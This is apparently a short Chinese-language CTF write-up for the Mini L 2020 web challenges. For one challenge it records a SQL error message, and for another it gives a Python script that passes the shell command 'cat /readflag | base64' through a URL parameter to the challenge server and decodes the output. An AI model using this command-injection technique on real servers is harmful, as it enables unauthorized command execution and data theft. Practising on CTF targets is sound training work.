Mini L 2020 题解

在 MiniL2021 之前玩耍一下

Web

id_wife

随便敲字符：

1	error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''')' at line 1`

啊啊啊发现自己的 SQL 注入方面其实根本就没学过，在网上也没有搜到很好的教程。无效尝试许久之后忍不住翻了答案：

Mini L CTF WriteUp By Int3rn3t_Expl0rer Team - Reverier’s Blog (wootec.top)

签到题

import requests
import base64
url = 'http://6c366814-f63f-4de8-954b-06ef78b851eb.archive.xdsec.chall.frankli.site/'

getdata = {'a' : 'cat /readflag | base64'}

req = requests.get(url= url , params=getdata)
# print(req.url)
# print(req.encoding)
out = req.text
out = out[:out.find('<code>')]
print(out)
with open('out','wb') as f:
    f.write(base64.b64decode(out))